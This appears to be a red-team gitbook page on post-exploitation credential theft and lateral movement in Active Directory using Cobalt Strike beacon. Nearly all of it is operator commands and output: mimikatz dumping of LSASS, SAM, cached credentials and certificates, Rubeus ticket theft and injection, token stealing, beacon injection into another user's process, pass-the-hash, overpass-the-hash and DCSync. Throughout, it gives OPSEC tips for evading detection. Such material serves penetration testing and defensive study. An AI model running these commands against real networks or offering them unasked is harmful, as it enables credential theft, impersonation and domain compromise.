Once we have access to user credentials or being able to impersonate the identity of a user we can move laterally.
In this section it will be explained how to obtain credentials after fully compromise a host (admin privs needed!).
Get users logged on the host
With the command net we can get any users that are currently logged onto the host.
beacon> net logons
Logged on users at \\localhost:
CORP\SRV-1$
CORP\user
With ps we can list which processes are running under which user.
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
448 796 RuntimeBroker.exe x64 1 CORP\user
Logon Passwords
As we seen on this gitbook, with mimikatz we can retrieve NTLM hashes from LSASS.
The sekurlsa::logonpasswords comman in mimikatz can dump plaintext passwords from memory if wdigest is enabled, which is disabled by default.
beacon> mimikatz sekurlsa::logonpasswords
Or we can use the short-command.
beacon> logonpasswords
After dumping the credentials, they are stored in View -> Credentials.
eKeys
Exists a mimikatz module that dumps kerberos encryption keys. Since most of the windows services choose to use kerberos over NTLM.
beacon> mimikatz sekurlsa::ekeys
We are interested in aes256_hmac and aes128_hmac if is available. It will be used during Overpass-The-Hash technique.
Certificates
To enumerate certificates use Seatbelt.
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates
Note: Ensure that the certificate is used for authentication.
We can dump certificates with mimikatz.
- For users:
beacon> mimikatz crypto::certificates /export
- For machines:
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export
NOTE: Mimikatz always export certificates with
mimikatzas password.
Download the file and sync files from cobalt strike to your local machine.
beacon> download C:\Users\user\CURRENT_USER_My_0_User Example.pfx
Note : Go to
View -> Downloadsto sync files.
Encode in base64 the .pfx file.
cat CURRENT_USER_My_0_User\ Example.pfx | base64 -w0
And finally use it to request a TGT.
Security Account Manager
The Security Account Manager (SAM) database holds the NTLM hashes of local accounts.
It’s common that a local administrator use the same password across the entire environment.
beacon> mimikatz lsadump::sam
Domain Cached Credentials
Domain Cached Credentials were designed for instances where domain credentials are required to logon to a machine, even whilst it’s disconnected from the domain.
beacon> mimikatz lsadump::cache
Make Token
The make_token module which takes the username, domain and plaintext password for a user, as well as a logon type.
This logon type allows the caller to clone its current token and specify new credentials for outbound connections. The new logon session has the same local identifier but uses different credentials for other network connections.
make_token uses LOGON32_LOGON_NEW_CREDENTIALS logon type.
beacon> make_token CORP\user Passw0rd!
With rev2self will drop the impersonation.
beacon> rev2self
[*] Tasked beacon to revert token
[+] host called home, sent: 20 bytes
Note We can also login as Local User:
beacon> make_token .\lapsadmin password
Extracting Kerberos Tickets
Instead of craft a TGT we can retrieve it directly from memory.
Rubeus triage will list the kerberos tickets in all the logon sessions.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus.exe triage
Action: Triage Kerberos Tickets (All Users)
[*] Current LUID : 0x3e7
-----------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
-----------------------------------------------------------------------------
| 0x462eb | user1 @ CORP.LOCAL | krbtgt/CORP.LOCAL | 5/12/2021 12:34:03 AM |
| 0x25ff6 | user2 @ CORP.LOCAL | krbtgt/CORP.LOCAL | 5/12/2021 12:33:41 AM |
-----------------------------------------------------------------------------
Note:
krbtgtservice means that the ticket is a TGT.
We can extrat it from memory with dump.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus.exe dump /service:krbtgt /luid:0x462eb /nowrap
Create a sacrificial logon with createnetonly and obtain a LUID and ProcessID.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
[*] Action: Create Process (/netonly)
[*] Showing process : False
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4872
[+] LUID : 0x92a8c
Now with ptt we can pass the extracted TGT.
execute-assembly C:\Tools\Rubeus\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
[*] Action: Import Ticket
[*] Target LUID: 0x92a8c
[+] Ticket successfully imported!
We can also use make_token and kerberos_ticket_use to import a TGT to the session.
Steal the access token of that process and access to the target resource.
beacon> steal_token 5674
Process Injection
We can inject a beacon payload into a target process in the form of shellcode.
If we inject the beacon into a process owned by a different user, the beacon will run with the local and domain privileges of that user.
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
448 796 explorer.exe x64 1 CORP\user
beacon> inject 448 x64 smb-p2p-payload
[+] established link to child beacon: 10.10.10.10
Note: If we try to inject into a process owned by other user we will need admin privs.
OPSEC Note: Don’t perform cross-platform injection unless is needed.
x64 -> x86orx86 -> x64
Token Impersonation
The steal_token command will impersonate the access token of the target process.
beacon> ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
448 796 explorer.exe x64 1 CORP\user
beacon> steal_token 448
[+] Impersonated CORP\user
Note:
steal_tokenis good for access remote resources across network but not for local actions.
With rev2self will drop the impersonation.
beacon> rev2self
[*] Tasked beacon to revert token
[+] host called home, sent: 20 bytes
Pass The Hash
Is a technique which allows you to authenticate to a Windows service using the NTLM hash of a user’s password.
Note: This modification process requires patching of LSASS memory which is high-risk action.
beacon> pth CORP\user 4ffd3eabdce2e158d923ddec72de9790
In order to avoid detection, we can use mimikatz and specify a own process.
beacon> mimikatz sekurlsa::pth /user:user /domain:corp.local /ntlm:4ffd3eabdce2e158d923ddec72de9790 /run:"powershell -w hidden"
OPSEC Alert: If no
/runparameter is specified, acmd.exewindow will be started. To avoid that usepowershell -w hiddento create a hidden window.
Finally use steal_token to impersonate the user ith the spawned process.
beacon> steal_token 4563
Once finished remember to to use rev2self and kill the spawned process.
beacon> rev2self
[*] Tasked beacon to revert token
[+] host called home, sent: 8 bytes
beacon> kill 4563
[*] Tasked beacon to kill 4563
[+] host called home, sent: 12 bytes
OverPass The Hash
OverPass The Hash also known as Pass The Key allows authentication with Kerberos rather than with NTLM.
We can use NTLM hash or AES Keys to request a Kerberos TGT Ticket.
To execute that technique we will use Rubeus.
beacon> execute-assembly C:\Tools\Rubeus.exe asktgt /user:user /domain:corp.local /rc4:4ffd3eabdce2e158d923ddec72de9790 /nowrap
OPSEC Alert: Use AES keys rather than NTLM. Rubeus has an
/opsecargument which tells it to send the request without pre-auth, to emulate a legit kerberos traffic.
beacon> execute-assembly C:\Tools\Rubeus.exe asktgt /user:user /domain:CORP /aes256:a561a175e395758550c9123c748a512b4b5eb1a211cbd12a1b139869f0c94ec10 /nowrap /opsec
Note: Don’t use FQDN
corp.localto specify the domain. Use the NetBIOSCORP.
Once a ticket is created we can check it with klist.
beacon> run klist
Finally we can use make_token with a dummy password to spawn a session.
beacon> make_token CORP\user NOTREALPASSWORD
To pass the TGT into this logon session, we can use Beacon’s kerberos_ticket_use command. This require that the ticket be on disk of our attacking workstation.
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\UserTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
Elevated context
If is on an elevated context, we can do it with Rubeus.
beacon> execute-assembly C:\Tools\Rubeus.exe asktgt /user:user /domain:corp.local /aes256:a561a175e395758550c9123c748a512b4b5eb1a211cbd12a1b139869f0c94ec10 /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
beacon> steal_token 3453
Pass The Ticket
We can use the make_token module with a fake password if we inject kerberos tickets on memory.
beacon> make_token CORP\user FakePass
We can use kerberos_ticket_use to select a TGT of the user to impersonate.
If we obtain a ticket from Rubeus and we have it in Base64 we will need to decode it and store on a file
PS C:\> [System.IO.File]::WriteAllBytes("C:\Tickets\user.kirbi", [System.Convert]::FromBase64String("doIGWD[...snip...]MuaW8="))
After that we can use the ticket.
beacon> kerberos_ticket_use C:\Tickets\user.kirbi
Note:
kerberos_ticket_useallows us to inject on memoryTGTandTGS.
Note: After importing the ticket make sure to always use the FQDN. If not some
1326 errorswill appear.
DCSync
The Directory Replication Service (MS-DRSR) protocol is used to synchronise and replicate Active Directory data between domain controllers. DCSync is a technique which leverages this protocol to extract username and credential data from a DC.
This tecnhique requires GetNCChanges which is usually only available for Domain Admins.
beacon> dcsync corp.local CORP\krbtgt